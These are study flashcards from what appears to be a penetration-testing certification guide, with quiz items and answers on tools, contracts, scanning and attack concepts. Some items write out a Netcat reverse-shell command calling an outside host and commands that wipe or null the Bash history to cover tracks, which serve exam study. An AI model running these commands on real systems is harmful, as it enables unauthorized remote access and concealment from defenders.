Wiley - Assessment Test missed/items Flashcards
Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?
- SQL injection
- VM escape
- Buffer overflow
- Cross‐site scripting
VM Escape
Web applications commonly experience SQL injection, buffer overflow, and cross‐site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You’ll learn more about all of these vulnerabilities in Chapters 5 and 9.
NDA
A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test.
SOW
An SOW is a statement of work, which defines what will be done during an engagement.
MSA
An MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work).
Noncompete
Noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.
Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?
- ZAP
- Nessus
- SonarQube
- OllyDbg
ZAP
The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing.
Nessus
Vulnerability Scanner
Nessus is designed to identify and report on potential vulnerabilities in computer systems, networks, and applications.
It performs this task by:
- scanning for open ports
- detecting services running on those ports
- testing those services for known vulnerabilities
SonarQube
SonarQube is a comprehensive code quality assurance tool designed to analyze and improve the quality, security, and maintainability of source code. SonarQube is a static application security testing (SAST) tool.
OllyDbg
OllyDbg is a powerful, user-friendly debugger and disassembler primarily designed for reverse engineering and debugging applications on Microsoft Windows.
Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?
- Record the details in the penetration testing report.
- Remediate the vulnerability that allowed her to gain access.
- Report the potential compromise to the client.
- No further action is necessary because Renee’s scope of work is limited to penetration testing.
Report the potential compromise to the client.
Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
- Black box
- Authenticated
- Internal view
- External view
An authenticated, or credentialed, scan provides the most detailed view of the system. Black‐box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow.
Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?
- history -c
- kill -9 $$
- echo "" > ~/.bash_history
- ln /dev/null ~/.bash_history -sf
ln /dev/null ~/.bash_history -sf
Although all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything.
Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?
- Nmap
- Nikto
- Wireshark
- CeWL
Nikto
Nikto
Nikto is an open-source web server scanner designed to identify and report on potential vulnerabilities and misconfigurations in web servers.
CeWL
The Custom Wordlist Generator (CeWL) is used to spider websites for keywords.
Wireshark
Wireshark is a powerful, free, and open-source network protocol analyzer that is widely used for capturing, displaying, and analyzing network traffic.
Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?
- OSINT
- HSI
- Background
- None of the above
OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test.
Which of the following activities constitutes a violation of integrity?
- Systems were taken offline, resulting in a loss of business income.
- Sensitive or proprietary information was changed or deleted.
- Protected information was accessed or exfiltrated.
- Sensitive personally identifiable information was accessed or exfiltrated.
Sensitive or proprietary information was changed or deleted.
Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach.
Ted wants to scan a remote system using Nmap and uses the following command:
nmap 149.89.80.0/24
How many TCP ports will he scan?
- 256
- 1,000
- 1,024
- 65,535
By default, Nmap will scan the 1,000 most common ports for both TCP and UDP.
Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?
- Penetration testing
- Vulnerability scanning
- Remediation
- Threat hunting
Threat hunting
Threat hunting uses the attacker mindset to search the organization’s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian’s activity clearly fits this definition.
Liam executes the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh
What has he done?
- Started a reverse shell using Netcat
- Captured traffic on the Ethernet port to the console via Netcat
- Set up a bind shell using Netcat
- None of the above
Started a reverse shell using Netcat
Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell.
Reverse Shell
A reverse shell is a type of cyber attack that allows an attacker to gain remote access to a victim’s machine by establishing a connection from the victim’s system back to the attacker’s system. This method circumvents traditional security measures, such as firewalls, which often filter incoming connections but may allow outgoing connections more freely.
How Reverse Shells Work
1. Connection Initiation: In a reverse shell scenario, the victim’s machine initiates an outbound connection to the attacker’s machine. This is in contrast to a traditional bind shell, where the attacker connects directly to the victim’s machine.
2. Exploitation: Attackers typically exploit vulnerabilities in applications or use social engineering techniques (such as phishing) to execute malicious scripts on the victim’s system. Once executed, these scripts create a connection back to the attacker’s server.
3. Command Execution: After the connection is established, the attacker can send commands to be executed on the victim’s machine, effectively gaining control over it as if they were physically present.
Netcat is often used with reverse shells.
Bind Shell
A bind shell is a type of network shell that allows an attacker to connect to a target machine by establishing a listening service on that machine. Here are the key aspects of bind shells:
Definition
A bind shell listens on a specific port for incoming connections. Once a connection is established, it provides the connecting user with a command-line interface (shell) on the target system, allowing them to execute commands remotely.
How Bind Shells Work
* Listening Service: The target machine runs a service (often created using tools like Netcat or custom scripts) that listens on a designated port for incoming connections.
* Connection Initiation: The attacker connects to this listening port from their own machine, effectively gaining access to the shell of the target system.
* Command Execution: Once connected, the attacker can execute commands as if they were physically present at the target machine.
Use Cases
* Remote Administration: Bind shells can be used legitimately by system administrators for remote management of servers and devices. They allow administrators to perform tasks such as monitoring system performance, updating software, and managing configurations.
* Malicious Activity: Attackers may use bind shells to gain unauthorized access to systems, execute commands, and potentially install malware.
Security Implications
Exposure Risk: Since bind shells listen for incoming connections, they can expose the target machine to unauthorized access if not properly secured. If an attacker discovers an open port, they can connect and take control of the system.
Firewall Challenges: Many firewalls block incoming connections by default, making bind shells less effective in environments with strict security measures. This limitation often leads attackers to prefer reverse shells instead.